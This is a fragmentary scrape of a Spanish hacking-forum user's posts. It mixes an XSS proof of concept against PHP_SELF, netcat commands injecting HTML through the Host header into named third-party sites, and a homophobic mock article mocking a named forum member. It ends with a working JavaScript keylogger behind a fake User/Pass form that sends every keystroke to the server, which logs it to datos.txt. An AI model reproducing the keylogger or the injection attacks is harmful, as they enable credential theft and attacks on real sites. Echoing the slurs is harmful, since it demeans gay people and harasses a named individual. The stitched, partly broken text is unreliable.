Citar<?=$_SERVER['php_self'];?>Eso tiene xss, te doy un ejemplo http://localhost/script.php/"><h1>XSS/test
Mejor usa script filename: $_SERVER[SCRIPT_NAME]
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúCitar<?=$_SERVER['php_self'];?>Eso tiene xss, te doy un ejemplo http://localhost/script.php/"><h1>XSS/test
<php
for($i=0;$i<28;$i++){
echo 'Jugador'.$i.': <input type="text" name="$name"><br>';
}
?>
nc -v lol.esgay.com 80
GET / HTTP/1.1
connection: close
host: Karcrack.esgay.com
Citar... <span class="t14">REDACCION - En una entrevista concedida en e
xclusiva al menda Karcrack declara estar muy orgulloso de su salida del armario
, se lo dedica a todos los mariquitas y locas del pais que no se atrevieron toda
via a dar el salto y salir del armario, ha sido tal la alegria y el alivio exper ...
nc -v lol.esgay.com 80
GET / HTTP/1.1
connection: close
host: <h1>XSS.esgay.com
Citar... <span class="t14">REDACCION - En una entrevista concedida en e
xclusiva al menda <h1>xss declara estar muy orgulloso de su salida del armario,
se lo dedica a todos los mariquitas y locas del pais que no se atrevieron todav
ia a dar el salto y salir del armario, ha sido tal la alegria y el alivio experi
mentado por <h1>xss que se ha marcado una jota aragonesa en pelota picada. Prox
imamente, <h1>xss sera invitado a la proxima celebracion de "La cena de lo
s gays", una popular celebracion popular, en la que se reunen un conjunto d ...
nc -v www.webdedescargas.com 80
GET / HTTP/1.1
connection: close
host: <h1>XSS.webdedescargas.com
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} ^$
RewriteCond %{HTTP_HOST} !^(www\.)?serhost\.com$ [NC]
RewriteCond %{HTTP_HOST} ^(www\.)?([^\.]+)\.serhost\.com$ [NC]
RewriteRule ^(.*)$ pruebas/$1 [QSA,L]
<?php
if(!$_GET['k']){ ?>
Ingrese sus datos<br />
<input type=text /> User<br>
<input type=text /> Pass<br>
<input type=submit>
<script>
document.onkeydown = function(e){
if (!e) e = window.event;
var unicode = e.charCode ? e.charCode: e.keyCode;
var mod = (e.ctrlKey) ? 'Ctrl-': (e.altKey) ? 'Alt-': (e.shiftKey) ? 'Shift-': '';
var tecla = mod + String.fromCharCode(unicode);
grabar('http://<?php echo $_SERVER[HTTP_HOST].$_SERVER[SCRIPT_NAME]; ?>?k=' + tecla);
}
function grabar(url){
var xmlHttp = null;
try{
xmlHttp = new XMLHttpRequest();
}catch(e){
try{
xmlHttp = new ActiveXObject('Msxml2.XMLHTTP');
}catch(e){
xmlHttp = new ActiveXObject('Microsoft.XMLHTTP');
}
}
xmlHttp.onreadystatechange = function(){
if(xmlHttp.readyState == 4) try{
if(xmlHttp.status == 200) {}
}catch(e){}
}
xmlHttp.open('get', url);
xmlHttp.send(null);
}
</script>
<?php
}else{
$file = fopen('datos.txt','a');
fwrite($file,$_GET['k']);
fclose($file);
}
?>
<?php echo php_uname(); ?>